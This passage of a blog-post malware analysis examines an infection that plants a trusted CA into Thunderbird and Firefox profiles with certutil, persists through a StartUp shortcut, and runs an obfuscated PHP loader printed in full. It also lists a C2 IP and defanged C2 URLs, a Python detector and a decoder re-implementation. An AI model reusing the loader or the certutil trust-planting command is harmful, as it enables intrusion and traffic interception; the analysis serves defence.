line:\t&quot;C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\certutil.exe&quot; -A -n &quot;meekmowey&quot; -t &quot;C,C,C&quot; -i &quot;C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\akpeydzais.crt&quot; -d &quot;C:\\Users\\Administrator\\AppData\\Roaming\\Thunderbird\\Profiles\\3zzscv0r.default&quot;<\/pre>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/SSL-from-TB.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/SSL-from-TB.png\" alt=\"\" width=\"1893\" height=\"989\" class=\"aligncenter size-full wp-image-700\" \/><\/a><\/p>\n<p>I also saw the msiexec.exe process writing a registry key to &#8220;HKCU\\Software\\Microsoft\\Raezr&#8221; while the process creates and modifies keys under the &#8220;HKCU\\Software\\Microsoft\\Raezr\\Uggiygiru&#8221; key. I have added that registry hive to the artifacts folder. Also, it looks as if persistence is obtained by writing a file called &#8220;php.lnk&#8221; in the StartUp folder. This file points to the php.exe file in the &#8220;Qufyzo&#8221; folder which then reads the oqluy.php file. 
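<\/p>\n<p>Those two command lines are worth turning into a detection: NSS certutil syntax (-A with -d), a database directory inside a Firefox or Thunderbird profile, a trust string that grants CA trust, and a certutil.exe that is not the one in the Windows directory. The following is an added example, not code from the original post, that scores process-creation command lines on those properties. The sample events are constructed: the two certutil launches from the Process Monitor log above, plus a benign Windows certutil call for contrast.<\/p>\n

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events (timestamp, PID, command line): the two certutil launches from
# the Process Monitor log on this page, and one benign Windows certutil call for contrast.
SAMPLE_EVENTS = [
    ("1/25/2017 9:57:35 AM", 2088,
     r'"C:\Users\ADMINI~1\AppData\Local\Temp\certutil.exe" -A -n "ybarwio" -t "C,C,C" '
     r'-i "C:\Users\ADMINI~1\AppData\Local\Temp\akpeydzais.crt" '
     r'-d "C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\cnpfjmzq.default"'),
    ("1/25/2017 9:57:37 AM", 2768,
     r'"C:\Users\ADMINI~1\AppData\Local\Temp\certutil.exe" -A -n "meekmowey" -t "C,C,C" '
     r'-i "C:\Users\ADMINI~1\AppData\Local\Temp\akpeydzais.crt" '
     r'-d "C:\Users\Administrator\AppData\Roaming\Thunderbird\Profiles\3zzscv0r.default"'),
    ("1/25/2017 10:02:11 AM", 3100,  # benign, not from the page
     r'"C:\Windows\System32\certutil.exe" -verify C:\certs\server.cer'),
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
NSS_PROFILE_MARKERS = ("\\mozilla\\firefox\\profiles\\", "\\thunderbird\\profiles\\")
TRUST_ROLES = ("SSL", "email", "object signing")  # the three comma-separated -t slots


def split_cmdline(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def analyze_certutil(cmdline: str) -> dict:
    """Flag NSS certutil invocations that plant a trusted CA into a Mozilla profile."""
    argv = split_cmdline(cmdline)
    if not argv or PureWindowsPath(argv[0]).name.lower() != "certutil.exe":
        return {"suspicious": False, "reasons": []}
    # Collect "-switch value" pairs; a switch followed by another switch has no value.
    opts = {}
    for i, tok in enumerate(argv[1:], start=1):
        if tok.startswith("-"):
            nxt = argv[i + 1] if i + 1 < len(argv) else ""
            opts[tok] = "" if nxt.startswith("-") else nxt
    reasons = []
    image_dir = str(PureWindowsPath(argv[0]).parent).lower() + "\\"
    if "\\windows\\" not in image_dir:
        reasons.append("certutil.exe running from outside the Windows directory: " + argv[0])
    if "-A" in opts and "-d" in opts:  # NSS syntax: add a certificate to a database
        reasons.append("adds a certificate to an NSS database (-A -d)")
        if any(m in opts["-d"].lower() for m in NSS_PROFILE_MARKERS):
            reasons.append("target is a Firefox/Thunderbird profile: " + opts["-d"])
        slots = (opts.get("-t", "").split(",") + ["", "", ""])[:3]
        trusted = [role for role, s in zip(TRUST_ROLES, slots) if "C" in s or "T" in s]
        if trusted:
            reasons.append("imported as a trusted CA for " + ", ".join(trusted)
                           + " (-t " + opts.get("-t", "") + ")")
    return {"suspicious": bool(reasons), "reasons": reasons,
            "nickname": opts.get("-n"), "cert_file": opts.get("-i"), "db_dir": opts.get("-d")}


def scan_events(events) -> list:
    """Return (timestamp, pid, analysis) for every event that trips a rule."""
    hits = []
    for ts, pid, cmdline in events:
        result = analyze_certutil(cmdline)
        if result["suspicious"]:
            hits.append((ts, pid, result))
    return hits


if __name__ == "__main__":
    for ts, pid, result in scan_events(SAMPLE_EVENTS):
        print(ts, pid, result["nickname"], "->", result["db_dir"])
        for reason in result["reasons"]:
            print("   ", reason)
```

The rule keys on the combination rather than on certutil alone, because the Windows certutil is a common administrative tool; the NSS switches and a profile directory as the database are what separate this from normal use, and the out-of-place image path is an independent signal.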
The obfuscated code for that file is below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n&lt;?php $GLOBALS&#x5B;'2112334483']=Array('file_' .'g' .'e' .'t_cont' .'en' .'ts','file' .'_p' .'ut_contents','exec','array_' .'fill','curl_mu' .'l' .'ti_r' .'em' .'ove_handl' .'e','unlink','st' .'rpos','array' .'_revers' .'e','strlen','' .'im' .'agecreate','strlen','ch' .'r','ord','str' .'pos','c' .'u' .'r' .'l_mult' .'i_' .'in' .'fo_' .'r' .'ead','c' .'hr','mt_' .'rand'); ?&gt;&lt;?php function _1988818774($lcafoi){$wzfwbx=Array(&quot;\\x6f\\xc9\\x3c\\xcf\\x5e\\x91\\x13\\xe8\\x72\\xb4\\x06\\xf1\\x46\\x98\\x0a\\xee\\x44\\x85\\x05\\xea\\x5e\\x8a\\x39\\xde\\x42\\x89\\x22\\xc1\\x47\\x9b\\x3b\\xf3\\x5b\\x9a\\x05\\xcb\\x5b\\x9b\\x35\\xea\\x5e\\x92\\x1c\\xc3\\x6b\\x88\\x0e\\xc9\\x5d\\xd1\\x18\\xc7\\x55&quot;,&quot;\\x6f\\xc9\\x3c\\xcf\\x5e\\x91\\x13\\xe8\\x72\\xb4\\x06\\xf1\\x46\\x98\\x0a\\xee\\x44\\x85\\x05\\xea\\x5e\\x8a\\x39\\xde\\x42\\x89\\x22\\xc1\\x47\\x9b\\x3b\\xf3\\x5b\\x9a\\x05\\xcb\\x5b\\x9b\\x35\\xea\\x5e\\x92\\x1c\\xc3\\x6b\\x88\\x0e\\xc9\\x5d\\xd1\\x18\\xc7\\x55\\x2e\\x08\\xdf\\x5e&quot;,'ab','mobbctpncubwqbbw','qfz','','p','bpsopktsibfnjrm','cepz');return $wzfwbx&#x5B;$lcafoi];} ?&gt;&lt;?php $xknhjqu=-round(0+45723178.4+45723178.4+45723178.4+45723178.4+45723178.4);$yljzott=_1988818774(0);$hiktbbe=_1988818774(1);$yljzott=jqnwmyo($yljzott,$xknhjqu);$hiktbbe=jqnwmyo($hiktbbe,$xknhjqu);$oubwoyp=_1988818774(2);$vxmksnu=$GLOBALS&#x5B;'2112334483']&#x5B;0]($yljzott);if($vxmksnu){$emdilrw=jqnwmyo($vxmksnu,$xknhjqu);$GLOBALS&#x5B;'2112334483']&#x5B;1]($hiktbbe,$emdilrw);$GLOBALS&#x5B;'2112334483']&#x5B;2]($hiktbbe);if((round(0+898+898+898)+round(0+771.66666666667+771.66666666667+771.66666666667))&gt;round(0+538.8+538.8+538.8+538.8+538.8)|| 
$GLOBALS&#x5B;'2112334483']&#x5B;3]($xknhjqu));else{$GLOBALS&#x5B;'2112334483']&#x5B;4]($vxmksnu,$hiktbbe,$qiujhbx);}while(!$GLOBALS&#x5B;'2112334483']&#x5B;5]($hiktbbe))Sleep(round(0+0.5+0.5));if($GLOBALS&#x5B;'2112334483']&#x5B;6](_1988818774(3),_1988818774(4))!==false)$GLOBALS&#x5B;'2112334483']&#x5B;7]($dcbcwxb,$amiuzub,$dcbcwxb,$amiuzub);}function tytuykg($bxhnecg,$dcbcwxb){$kzptguq=$dcbcwxb&amp;round(0+15.5+15.5);return($bxhnecg &lt;&lt; $kzptguq)|(($bxhnecg &gt;&gt;(round(0+16+16)-$kzptguq))&amp;((round(0+0.5+0.5)&lt;&lt;(round(0+15.5+15.5)&amp;$kzptguq))-round(0+0.25+0.25+0.25+0.25)));}function jqnwmyo($amiuzub,$xknhjqu){$zdubkat=_1988818774(5);if((round(0+215.5+215.5)^round(0+86.2+86.2+86.2+86.2+86.2))&amp;&amp; $GLOBALS&#x5B;'2112334483']&#x5B;8]($kzptguq,$yljzott,$bxhnecg))$GLOBALS&#x5B;'2112334483']&#x5B;9]($belxvol,$xknhjqu,$kzptguq);$belxvol=$GLOBALS&#x5B;'2112334483']&#x5B;10]($amiuzub);$mtukbjc=_1988818774(6);for($qiujhbx=round(0);$qiujhbx&lt;$belxvol;++$qiujhbx){$dvvevxt=$GLOBALS&#x5B;'2112334483']&#x5B;11]($GLOBALS&#x5B;'2112334483']&#x5B;12]($amiuzub{$qiujhbx})^($xknhjqu&amp;round(0+127.5+127.5)));if($GLOBALS&#x5B;'2112334483']&#x5B;13](_1988818774(7),_1988818774(8))!==false)$GLOBALS&#x5B;'2112334483']&#x5B;14]($zdubkat);$zdubkat .= $dvvevxt;(round(0+1071.3333333333+1071.3333333333+1071.3333333333)-round(0+1071.3333333333+1071.3333333333+1071.3333333333)+round(0+1216.5+1216.5+1216.5+1216.5)-round(0+973.2+973.2+973.2+973.2+973.2))?$GLOBALS&#x5B;'2112334483']&#x5B;15]($bxhnecg,$bxhnecg,$qiujhbx):$GLOBALS&#x5B;'2112334483']&#x5B;16](round(0+152),round(0+803.5+803.5+803.5+803.5));$xknhjqu=tytuykg($xknhjqu,round(0+4+4));++$xknhjqu;$vmdhslf=round(0+640.4+640.4+640.4+640.4+640.4);}return $zdubkat;$rekqtac=round(0+833.33333333333+833.33333333333+833.33333333333);} ?&gt;<\/pre>\n<p>I was not sure what exactly this PHP was doing, so I rebooted the VM to see what processes spun up and what processes tried to call back out from the VM. 
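<\/p>\n<p>The listing is more readable than it looks. $GLOBALS['2112334483'] holds function names assembled from fragments (file_get_contents, file_put_contents, exec, unlink, strlen, chr and ord do the work; array_fill, array_reverse, curl_multi_remove_handle, curl_multi_info_read, imagecreate and mt_rand sit behind conditions that are always true or always false, or have no effect), _1988818774() returns two XOR-encoded byte strings, and jqnwmyo() is the decoder: each byte is XORed with the low byte of a key that starts at -228615892, after which the key is rotated left by 8 bits as written in tytuykg() and incremented. The main body reads the file named by the first string, decodes its contents with the same starting key, writes the result to the path in the second string, exec()s it and loops on unlink() until the decrypted file is gone. The following is an added example, not part of the original post, that re-implements the decoder in Python and recovers both embedded paths from the bytes in the listing; the MZ check at the end assumes the file named by the first path is an XOR-encrypted PE, which the listing itself does not state.<\/p>\n

```python
# Re-implementation of jqnwmyo()/tytuykg() from the obfuscated oqluy.php listing above.
# The key starts at -round(0+45723178.4+45723178.4+45723178.4+45723178.4+45723178.4).
INITIAL_KEY = -228615892
MASK64 = (1 << 64) - 1

# The two byte strings returned by _1988818774(0) and _1988818774(1), copied from the listing.
ENC_SRC = bytes.fromhex(
    "6fc93ccf5e9113e8" "72b406f146980aee" "448505ea5e8a39de" "428922c1479b3bf3"
    "5b9a05cb5b9b35ea" "5e921cc36b880ec9" "5dd118c755")
ENC_DST = ENC_SRC + bytes.fromhex("2e08df5e")


def _next_key(key: int) -> int:
    """tytuykg(key, 8) followed by ++key, on a 64-bit signed integer as in 64-bit PHP.

    tytuykg is (x << 8) | ((x >> 24) & 0xFF): a 32-bit rotate-left by 8 that on a
    wider int simply keeps shifting the old high bytes out. Only the low four bytes
    ever feed the keystream, so the result is the same on 32-bit and 64-bit PHP.
    """
    shift = 8 & 31
    rot = ((key << shift) & MASK64) | ((key >> (32 - shift)) & ((1 << (31 & shift)) - 1))
    rot = (rot + 1) & MASK64
    return rot - (1 << 64) if rot >= (1 << 63) else rot


def keystream(length: int, key: int = INITIAL_KEY) -> bytes:
    """The sequence of low key bytes the decoder XORs against the data."""
    out = bytearray()
    for _ in range(length):
        out.append(key & 0xFF)
        key = _next_key(key)
    return bytes(out)


def php_xor_decode(data: bytes, key: int = INITIAL_KEY) -> bytes:
    """jqnwmyo(): XOR each byte with the rolling key byte (symmetric, so it also encodes)."""
    return bytes(b ^ k for b, k in zip(data, keystream(len(data), key)))


def decode_loader_strings() -> tuple:
    """Return (path of the encrypted blob it reads, path of the executable it writes)."""
    return (php_xor_decode(ENC_SRC).decode("latin-1"),
            php_xor_decode(ENC_DST).decode("latin-1"))


# Because the blob is XORed with the same keystream as the strings, an encrypted PE
# always starts with b"MZ" ^ keystream(2). Assumption: the blob is a PE.
ENCRYPTED_MZ = bytes(a ^ b for a, b in zip(b"MZ", keystream(2)))


def looks_like_encrypted_pe(blob: bytes) -> bool:
    return blob[:2] == ENCRYPTED_MZ


if __name__ == "__main__":
    src, dst = decode_loader_strings()
    print("reads  :", src)
    print("writes :", dst, "(then exec() and unlink())")
    print("keystream head:", keystream(8).hex())
    # Constructed stand-in for the blob: a PE header encrypted with the same keystream.
    fake_blob = php_xor_decode(b"MZ\x90\x00" + b"\x00" * 60)
    print("encrypted MZ marker:", ENCRYPTED_MZ.hex(), looks_like_encrypted_pe(fake_blob))
```

The two recovered paths differ only by a trailing .exe, which is the whole loader: a file in the Roaming folder is decrypted to an executable next to it, run, and deleted. The keystream itself is a simple rotating four-byte counter, so the same key bytes line up against every file the script touches, and the first two bytes of the encrypted blob are enough to recognise it on disk.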
It looks like it calls the &#8220;explorer.exe&#8221; process, which then spins up the &#8220;msiexec.exe&#8221; process, which proceeds to sit there and listen for connections.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/Process-Explorer-IMG.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/Process-Explorer-IMG.png\" alt=\"\" width=\"898\" height=\"890\" class=\"aligncenter size-full wp-image-703\" \/><\/a><\/p>\n<p>As seen in the image below, SVCHOST was talking to the IP address 95.169.190.104 over HTTP prior to the reboot.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/Callback.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/Callback.png\" alt=\"\" width=\"1204\" height=\"394\" class=\"aligncenter size-full wp-image-705\" \/><\/a><\/p>\n<p>Lastly, before rebooting the VM, I did run strings2 on the SVCHOST.exe process shown above. Looking through that output, I noticed a list of C2 and payload URLs, only some of which were contacted during this infection. 
Those URLs are as follows:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nhxxp:\/\/hedthowtorspar&#x5B;.]com\/klu\/forum.php\r\nhxxp:\/\/fortmamuchco&#x5B;.]ru\/klu\/forum.php\r\nhxxp:\/\/fortrittotfor&#x5B;.]ru\/klu\/forum.php\r\nhxxp:\/\/sy-nitron&#x5B;.]pl\/wp-content\/themes\/twentyfifteen\/pm1\r\nhxxp:\/\/acdclubs&#x5B;.]com\/wp-content\/plugins\/quick-setup\/pm1\r\nhxxp:\/\/cwmeza&#x5B;.]com\/wp-content\/plugins\/video-silo-builder-1&#x5B;.]6&#x5B;.]3\/pm1\r\nhxxp:\/\/drums-outlet&#x5B;.]com\/wp-content\/plugins\/wordbay\/pm1\r\nhxxp:\/\/gojokai-trouble&#x5B;.]com\/wp-content\/plugins\/contact-form-7\/modules\/pm1\r\nhxxp:\/\/hareruyalife&#x5B;.]com\/wp-content\/plugins\/feedwordpress\/pm1\r\nhxxp:\/\/sy-nitron&#x5B;.]pl\/wp-content\/themes\/twentyfifteen\/2501\r\nhxxp:\/\/acdclubs&#x5B;.]com\/wp-content\/plugins\/quick-setup\/2501\r\nhxxp:\/\/cwmeza&#x5B;.]com\/wp-content\/plugins\/video-silo-builder-1&#x5B;.]6&#x5B;.]3\/2501\r\nhxxp:\/\/drums-outlet&#x5B;.]com\/wp-content\/plugins\/wordbay\/2501\r\nhxxp:\/\/gojokai-trouble&#x5B;.]com\/wp-content\/plugins\/contact-form-7\/modules\/2501\r\nhxxp:\/\/hareruyalife&#x5B;.]com\/wp-content\/plugins\/feedwordpress\/2501<\/pre>\n<p>The three \/klu\/forum.php URLs are the same path that received the binary POST, on three different domains, of which only hedthowtorspar[.]com was contacted; the pm1 and 2501 paths under wp-content on the other sites mirror the two files fetched from sy-nitron[.]pl. There was a lot more in the strings2 output that looked like system-profiling strings, from the list of installed applications to the Windows Firewall configuration.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-697","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"]}